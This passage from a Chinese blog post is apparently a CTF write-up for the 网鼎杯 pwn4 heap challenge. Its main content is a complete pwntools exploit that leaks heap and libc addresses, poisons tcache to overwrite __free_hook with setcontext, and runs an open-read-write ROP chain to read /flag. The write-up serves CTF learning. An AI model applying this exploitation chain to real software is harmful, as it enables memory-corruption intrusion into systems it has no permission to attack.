class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">7</span>, <span class="number">0x150</span>, rc4(p64(setcontext+<span class="number">53</span>)+payload_orw))</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>我不直接用SigretureFrame()的原因是本地调试时会出错，所以人工对着偏移设置的各个寄存器:-(。记得在exp脚本开头设置面向操作系统和架构</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>记得预备free的堆块，就是设置setcontext上下文的那个堆块要申请的大一点(&gt;0xa0)，不然会导致后面寄存器写不上去的情况，同时也可以方便一点之后的orw，提前把open的寄存器设置好，当然求稳也可以写到orw里。</p>
<h2 id="总exp"><a href="#总exp" class="headerlink" title="总exp"></a>总exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher3 <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">filename = <span class="string">&#x27;pwn&#x27;</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exec_fmt</span>(<span class="params">pad</span>):</span><br><span class="line">    p = process(<span class="string">&#x27;./&#x27;</span>+filename)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Enter your name: &quot;</span>, pad)</span><br><span class="line">    p.recvuntil(<span class="string">b&#x27;Hello, &#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> p.recv()</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">fmt = FmtStr(exec_fmt)</span></span><br><span class="line"><span class="string">print(&quot;offset ===&gt; &quot;, fmt.offset)</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">IP = <span class="string">&#x27;&#x27;</span></span><br><span class="line">debug = <span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    p = remote(<span class="string">&#x27;0192d6893cc27e60b227aa9ef34bad8f.t1dx.dg03.ciihw.cn&#x27;</span>, <span class="number">44732</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = process(<span class="string">&#x27;./&#x27;</span>+filename)</span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&#x27;./&#x27;</span>+filename)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dbg</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line"></span><br><span class="line">ubuntu16 = [<span class="string">&#x27;~/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6&#x27;</span>, <span class="string">&#x27;~/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc.so.6&#x27;</span>]</span><br><span class="line">ubuntu18 = [<span class="string">&#x27;~/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6&#x27;</span>, <span class="string">&#x27;~/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6&#x27;</span>]</span><br><span class="line">libc = ELF(<span class="string">&#x27;/home/marcel/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">leak</span>(<span class="params">something</span>):</span><br><span class="line">    rc = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line">    success(something+<span class="string">&quot;----&gt;&quot;</span>+<span class="built_in">hex</span>(rc))</span><br><span class="line">    <span class="keyword">return</span> rc</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">leak_fmt</span>(<span class="params">something</span>):</span><br><span class="line">    rc = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>)</span><br><span class="line">    success(something+<span class="string">&quot;----&gt;&quot;</span>+<span class="built_in">hex</span>(rc))</span><br><span class="line">    <span class="keyword">return</span> rc</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">idx, size, content</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;&gt; \n&quot;</span>, <span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Input the key: &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Input the value size: &quot;</span>, <span class="built_in">str</span>(size-<span class="number">1</span>))</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Input the value: &quot;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;&gt; \n&quot;</span>, <span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Input the key: &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;&gt; \n&quot;</span>, <span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Input the key: &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx, content</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;&gt; \n&quot;</span>, <span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Input the key: &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Input the value: &quot;</span>, content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ksa</span>(<span class="params">dest, password, length</span>):</span><br><span class="line">    <span class="comment"># 初始化 S-box</span></span><br><span class="line">    S_box = <span class="built_in">list</span>(<span class="built_in">range</span>(<span class="number">256</span>))</span><br><span class="line">    password_1 = [<span class="number">0</span>] * <span class="number">256</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 根据密钥生成 password_1</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">        password_1[i] = <span class="built_in">ord</span>(password[i % length])</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 执行密钥调度算法</span></span><br><span class="line">    j = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">256</span>):</span><br><span class="line">        j = (j + S_box[i] + password_1[i]) % <span class="number">256</span></span><br><span class="line">        S_box[i], S_box[j] = S_box[j], S_box[i]</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> S_box</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">prga</span>(<span class="params">S_box, data, length</span>):</span><br><span class="line">    i = <span class="number">0</span></span><br><span class="line">    j = <span class="number">0</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(length):</span><br><span class="line">        i = (i + <span class="number">1</span>) % <span class="number">256</span></span><br><span class="line">        j = (j + S_box[i]) % <span class="number">256</span></span><br><span class="line">        </span><br><span class="line">        <span class="comment"># 交换 S-box 中的元素</span></span><br><span class="line">        S_box[i], S_box[j] = S_box[j], S_box[i]</span><br><span class="line">        </span><br><span class="line">        <span class="comment"># 生成密钥流字节并与数据异或</span></span><br><span class="line">        key_stream_byte = S_box[(S_box[i] + S_box[j]) % <span class="number">256</span>]</span><br><span class="line">        data[k] ^= key_stream_byte</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> data</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">rc4</span>(<span class="params">data</span>):</span><br><span class="line">    password = <span class="string">&#x27;s4cur1ty_p4ssw0rd&#x27;</span></span><br><span class="line">    <span class="comment"># 转换 data 为 bytearray</span></span><br><span class="line">    data = <span class="built_in">bytearray</span>(data.encode() <span class="keyword">if</span> <span class="built_in">isinstance</span>(data, <span class="built_in">str</span>) <span class="keyword">else</span> data)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 获取数据长度</span></span><br><span class="line">    length = <span class="built_in">len</span>(data)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 初始化 S-box</span></span><br><span class="line">    S_box = ksa(<span class="literal">None</span>, password, <span class="built_in">len</span>(password))</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 加密/解密数据</span></span><br><span class="line">    prga(S_box, data, length)</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bytes</span>(data)</span><br><span class="line"></span><br><span class="line">username = <span class="string">&#x27;4dm1n&#x27;</span></span><br><span class="line">passwd = <span class="string">&#x27;985da4f8cb37zkj&#x27;</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&quot;Input your username:&quot;</span>, username)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Input your password:&quot;</span>, passwd)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x70</span>, <span class="string">b&#x27;aaaa&#x27;</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;[0,&#x27;</span>)</span><br><span class="line">encry1 = p.recv(<span class="number">8</span>)</span><br><span class="line">success(<span class="string">&quot;encry1----&gt;&quot;</span>+<span class="built_in">hex</span>(u64(encry1)))</span><br><span class="line">heap = rc4((encry1))</span><br><span class="line">success(<span class="string">&quot;heap----&gt;&quot;</span>+<span class="built_in">hex</span>(u64(heap)))</span><br><span class="line">heap_base = u64(heap)+<span class="number">0x55b4ebaab000</span>-<span class="number">0x55b4ebaabc70</span></span><br><span class="line">success(<span class="string">&quot;heap_base----&gt;&quot;</span>+<span class="built_in">hex</span>(heap_base))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>):</span><br><span class="line">    add(i, <span class="number">0x150</span>, <span class="string">b&#x27;a&#x27;</span>)<span class="comment">#tcache*7+unsorted*1+seperate*1</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">    delete(i)</span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;[7,&#x27;</span>)</span><br><span class="line">encry2 = p.recv(<span class="number">8</span>)</span><br><span class="line">main_arena = u64(rc4(encry2)) -<span class="number">0x96</span></span><br><span class="line">success(<span class="string">&quot;main_arena----&gt;&quot;</span>+<span class="built_in">hex</span>(main_arena))</span><br><span class="line">libc_base = main_arena+ <span class="number">0x7f14b1604000</span> - <span class="number">0x7f14b19efc0a</span></span><br><span class="line">success(<span class="string">&quot;libc_base----&gt;&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line">free_hook = libc_base+libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;frame = SigreturnFrame()</span></span><br><span class="line"><span class="string">frame.rdi = free_hook+0x100</span></span><br><span class="line"><span class="string">frame.rsi = 0</span></span><br><span class="line"><span class="string">frame.rdx = 0</span></span><br><span class="line"><span class="string">frame.rsp = free_hook+0x8</span></span><br><span class="line"><span class="string">frame.rip = libc_base+libc.sym[&#x27;open&#x27;]&#x27;&#x27;&#x27;</span></span><br><span class="line">frame = <span class="string">b&#x27;&#x27;</span></span><br><span class="line">frame = frame.ljust(<span class="number">0x68</span>, <span class="string">b&#x27;\x00&#x27;</span>)+p64(free_hook+<span class="number">0x108</span>)+p64(<span class="number">0</span>) <span class="comment">#rdi rsi</span></span><br><span class="line">frame = frame.ljust(<span class="number">0x88</span>, <span class="string">b&#x27;\x00&#x27;</span>)+p64(<span class="number">0</span>) <span class="comment">#rdx</span></span><br><span class="line">frame = frame.ljust(<span class="number">0xa0</span>, <span class="string">b&#x27;\x00&#x27;</span>)+p64(free_hook+<span class="number">8</span>)+p64(libc_base+libc.sym[<span class="string">&#x27;open&#x27;</span>])<span class="comment">#rsp rcx</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x160</span>, <span class="built_in">bytes</span>(frame))</span><br><span class="line"></span><br><span class="line">rdi = libc_base + <span class="number">0x2164f</span></span><br><span class="line">rsi = libc_base + <span class="number">0x23a6a</span></span><br><span class="line">rdx = libc_base + <span class="number">0x1b96</span></span><br><span class="line">setcontext = libc_base+libc.sym[<span class="string">&#x27;setcontext&#x27;</span>]</span><br><span class="line">payload_orw = p64(rdi)+p64(<span class="number">3</span>)+p64(rsi)+p64(heap_base+<span class="number">0x1100</span>)+p64(rdx)+p64(<span class="number">0x100</span>)+p64(libc_base+libc.sym[<span class="string">&#x27;read&#x27;</span>])</span><br><span class="line">payload_orw += p64(rdi)+p64(<span class="number">1</span>)+p64(libc_base+libc.sym[<span class="string">&#x27;write&#x27;</span>])</span><br><span class="line">payload_orw = payload_orw.ljust(<span class="number">0x100</span>, <span class="string">b&#x27;\x00&#x27;</span>)+<span class="string">b&#x27;/flag\x00&#x27;</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">6</span>, rc4(p64(free_hook)))</span><br><span class="line">add(<span class="number">7</span>, <span class="number">0x150</span>, <span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">7</span>, <span class="number">0x150</span>, rc4(p64(setcontext+<span class="number">53</span>)+payload_orw))</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h1 id="Refer"><a href="#Refer" class="headerlink" title="Refer"></a>Refer</h1><p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/Mr_Fmnwon/article/details/143355594" >https://blog.csdn.net/Mr_Fmnwon/article/details/143355594<i class="fas fa-external-link-alt"></i></a></p>

                    
                </div>

                
                        
<div class="post-copyright-info-container border-box">
    <div class="copyright-info-content border-box">
        <div class="copyright-info-top border-box">
            <div class="copyright-post-title border-box text-ellipsis">
                网鼎杯pwn4复现
            </div>

            <div class="copyright-post-link border-box text-ellipsis">
                2024/10/31/网鼎杯pwn4复现/
            </div>
        </div>

        <div class="copyright-info-bottom border-box">
            <div class="copyright-post-author bottom-item">
                <div class="type">
                    作者
                </div>
                <div class="content">Marce1</div>
            </div>

            <div class="post-time bottom-item">
                <div class="type">
                    发布于
                </div>
                <div class="content">2024-10-31 00:01</div>
            </div>


            <div class="post-license bottom-item">
                <div class="type">
                    许可
                </div>
                <div class="content tooltip" data-tooltip-content="CC BY-NC-SA 4.0">
                    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-hans" target="_blank">
                        
                            <i class="fa-brands fa-creative-commons"></i>
                            <i class="fa-brands fa-creative-commons-by"></i>
                            <i class="fa-brands fa-creative-commons-nc"></i>
                            <i class="fa-brands fa-creative-commons-sa"></i>
                        
                    </a>
                </div>
            </div>
        </div>

        <i class="copyright-bg fa-solid fa-copyright"></i>
    </div>
    <div class="copy-copyright-info flex-center tooltip" data-tooltip-content="复制版权信息" data-tooltip-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/pwn/">pwn</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/blasting/">blasting</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/heap/">heap</a>
                                    </li>
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/setcontext/">setcontext</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                            <div class="post-share-container border-box">
    <ul class="share-list-wrap border-box">
        <li class="qq share-item border-box flex-center tooltip"
            data-tooltip-content="分享到 QQ"
        >
            <i class="fa-brands fa-qq"></i>
        </li>
        <li class="wechat share-item border-box flex-center tooltip tooltip-img"
            data-tooltip-content="分享到微信"
            data-tooltip-img-tip="微信扫一扫"
            data-tooltip-img-style="background-color: #fff; top: -10px; padding: 0.6rem 0.6rem 0.1rem 0.6rem;"
        >
            <i class="fa-brands fa-weixin"></i>
        </li>
        <li class="weibo share-item border-box flex-center tooltip"
            data-tooltip-content="分享到微博"
        >
            <i class="fa-brands fa-weibo"></i>
        </li>
    </ul>
</div>

                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2024/11/01/c%E8%89%B9pwn%E5%AD%A6%E4%B9%A0/"
                                   title="c艹pwn学习"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">c艹pwn学习</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4"><span class="nav-text">网鼎杯pwn4</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%88%86%E7%A0%B4%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81"><span class="nav-text">爆破账号密码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E5%86%85%E5%AE%B9%E5%8A%A0%E5%AF%86"><span class="nav-text">存储内容加密</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%84%E9%9C%B2%E5%A0%86%E5%9C%B0%E5%9D%80%E4%B8%8Elibc%E5%9C%B0%E5%9D%80"><span class="nav-text">泄露堆地址与libc地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#setcontext-orw"><span class="nav-text">setcontext &amp; orw</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BBexp"><span class="nav-text">总exp</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Refer"><span class="nav-text">Refer</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
        &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2025
        
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Marce1</a>
        
    </div>

    <div class="theme-info info-item">
        由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    
        <div class="count-info info-item">
            
                <span class="count-item border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">45k</span>
                </span>
            

            
                <span class="count-item border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-item border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BD%91%E9%BC%8E%E6%9D%AFpwn4"><span class="nav-text">网鼎杯pwn4</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%88%86%E7%A0%B4%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81"><span class="nav-text">爆破账号密码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AD%98%E5%82%A8%E5%86%85%E5%AE%B9%E5%8A%A0%E5%AF%86"><span class="nav-text">存储内容加密</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%84%E9%9C%B2%E5%A0%86%E5%9C%B0%E5%9D%80%E4%B8%8Elibc%E5%9C%B0%E5%9D%80"><span class="nav-text">泄露堆地址与libc地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#setcontext-orw"><span class="nav-text">setcontext &amp; orw</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BBexp"><span class="nav-text">总exp</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Refer"><span class="nav-text">Refer</span></a></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/utils.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/header-shrink.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/back2top.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/toggle-theme.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/code-block.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/main.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/libs/anime.min.js"></script>

<!-- local search -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/local-search.min.js"></script>


<!-- lazyload -->


<div class="pjax">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/post/post-helper.min.js"></script>

        <!-- toc -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/post/toc.min.js"></script>
        

        <!-- copyright-info -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/post/copyright-info.min.js"></script>
        

        <!-- share -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/post/share.min.js"></script>
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.3/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
